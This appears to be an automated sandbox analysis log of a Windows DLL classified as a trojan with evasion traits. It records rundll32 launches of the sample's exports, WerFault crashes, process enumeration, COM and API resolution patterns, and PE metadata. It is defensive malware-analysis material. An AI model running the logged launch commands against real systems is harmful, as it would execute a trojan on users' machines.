              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1Jump to behavior
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KInMQFJump to behavior
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KwNqBn2l9NJump to behavior
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\o7m2se.dll,LLBMPMUsqfJump to behavior
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",KInMQFJump to behavior
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",KwNqBn2l9NJump to behavior
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",LLBMPMUsqfJump to behavior
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",SrNF6DaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1Jump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7064 -s 316Jump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7072 -s 316Jump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7140 -s 316Jump to behavior
              Source: C:\Windows\System32\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER76C0.tmpJump to behavior
              Source: classification engineClassification label: mal100.troj.evad.winDLL@33/24@0/1
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205D0410 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoUninitialize,SysAllocString,SysFreeString,SysFreeString,CoSetProxyBlanket,CoUninitialize,14_2_00000215205D0410
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205D0330 CreateToolhelp32Snapshot,Process32FirstW,StrCmpIW,CloseHandle,Process32NextW,StrCmpIW,Process32NextW,CloseHandle,FindCloseChangeNotification,14_2_00000215205D0330
              Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KInMQF
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7064
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7140
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6560
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6572
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7072
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6796
              Source: rundll32.exeString found in binary or memory: Accept-Additions
              Source: rundll32.exeString found in binary or memory: List-Help
              Source: rundll32.exeString found in binary or memory: MMHS-Exempted-Address
              Source: rundll32.exeString found in binary or memory: Originator-Return-Address
              Source: rundll32.exeString found in binary or memory: Originator-Return-Address
              Source: rundll32.exeString found in binary or memory: List-Help
              Source: rundll32.exeString found in binary or memory: MMHS-Exempted-Address
              Source: rundll32.exeString found in binary or memory: Accept-Additions
              Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
              Source: o7m2se.dllStatic PE information: Image base 0x180000000 > 0x60000000
              Source: o7m2se.dllStatic file information: File size 1530368 > 1048576
              Source: o7m2se.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: o7m2se.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: o7m2se.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: o7m2se.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: o7m2se.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: o7m2se.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: o7m2se.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: UxTheme.pdb source: WerFault.exe, 00000017.00000003.521546390.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522351148.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521967763.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522361320.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524163906.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524067138.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: gdi32.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522255145.000001CE21214000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522302209.0000018686D84000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524155590.000001F5F3FB4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 32.pdb source: WerFault.exe, 00000019.00000003.523380302.000001F5F180D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: sechost.pdb source: WerFault.exe, 00000017.00000003.521546390.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522351148.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521967763.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522361320.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524163906.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524067138.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rpcrt4.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: kernelbase.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: combase.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: win32u.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522255145.000001CE21214000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522302209.0000018686D84000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524155590.000001F5F3FB4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msctf.pdb source: WerFault.exe, 00000017.00000003.521546390.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522351148.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521967763.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522361320.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524163906.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524067138.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .pdbj source: WerFault.exe, 00000018.00000002.540677805.0000018684311000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .pdb& source: WerFault.exe, 00000018.00000002.540677805.0000018684311000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: gdi32full.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522255145.000001CE21214000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522302209.0000018686D84000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524155590.000001F5F3FB4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .pdb' source: WerFault.exe, 00000019.00000002.540787106.000001F5F17F2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: gdi32.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522255145.000001CE21214000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522302209.0000018686D84000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524155590.000001F5F3FB4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: user32.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000017.00000003.522242157.000001CE21210000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522247900.0000018686D80000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524143635.000001F5F3FB0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rundll32.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rpcrt4.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: imagehlp.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows32.pdb' source: WerFault.exe, 00000019.00000003.523380302.000001F5F180D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb source: WerFault.exe, 00000017.00000003.511558759.000001CE2070A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.514011681.000001CE2070A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.516424452.00000186861AA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.514612330.00000186861AA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.516159154.000001F5F353A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.512599113.000001F5F353A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: combase.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: kernel32.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.513682177.000001CE20710000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.511592812.000001CE20710000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.514620485.00000186861B0000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.516093975.00000186861B0000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.515614989.000001F5F3540000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.512632464.000001F5F3540000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rundll32.pdb source: WerFault.exe, 00000017.00000003.511506037.000001CE20704000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000002.543116730.000001CE20B07000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000002.541171177.00000186865A7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.514587771.00000186861A4000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000002.542096728.000001F5F3937000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.512231733.000001F5F3534000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcrt.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000017.00000003.521546390.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522351148.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521967763.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522361320.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524163906.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524067138.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: kernel32.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: win32u.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522255145.000001CE21214000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522302209.0000018686D84000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524155590.000001F5F3FB4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: gdi32full.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522255145.000001CE21214000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522302209.0000018686D84000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524155590.000001F5F3FB4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: user32.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000017.00000003.521546390.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522351148.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521967763.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522361320.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524163906.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524067138.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb0 source: WerFault.exe, 00000017.00000003.511558759.000001CE2070A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.514011681.000001CE2070A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.516424452.00000186861AA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.514612330.00000186861AA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.516159154.000001F5F353A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.512599113.000001F5F353A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: kernelbase.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: kernel32.pdb0 source: WerFault.exe, 00000017.00000003.513682177.000001CE20710000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.511592812.000001CE20710000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.514620485.00000186861B0000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.516093975.00000186861B0000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.515614989.000001F5F3540000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.512632464.000001F5F3540000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: imm32.pdb source: WerFault.exe, 00000017.00000003.522242157.000001CE21210000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522247900.0000018686D80000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524143635.000001F5F3FB0000.00000004.00000020.00020000.00000000.sdmp
              Source: o7m2se.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: o7m2se.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: o7m2se.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: o7m2se.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: o7m2se.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535EC799 push rdi; ret 2_2_00007FFA535EC7A2
              Source: C:\Windows\System32\rundll32.exeCode function: 2_2_00007FFA535ED22D push rdi; ret 2_2_00007FFA535ED234
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535ED22D push rdi; ret 14_2_00007FFA535ED234
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00007FFA535EC799 push rdi; ret 14_2_00007FFA535EC7A2
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205C5490 GetModuleHandleW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,_com_util::ConvertStringToBSTR,_com_issue_error,SysFreeString,new,_com_util::ConvertStringToBSTR,_com_issue_error,SysFreeString,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,wsprintfW,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,_com_util::ConvertStringToBSTR,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,wsprintfW,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,SysAllocString,_com_issue_error,VariantInit,VariantInit,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,VariantClear,VariantClear,VariantClear,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,new,SysAllocString,_com_issue_error,_com_issue_error,SysFreeString,14_2_00000215205C5490
              Source: C:\Windows\System32\rundll32.exeCode function: 14_2_00000215205D7684 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,14_2_00000215205D7684
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
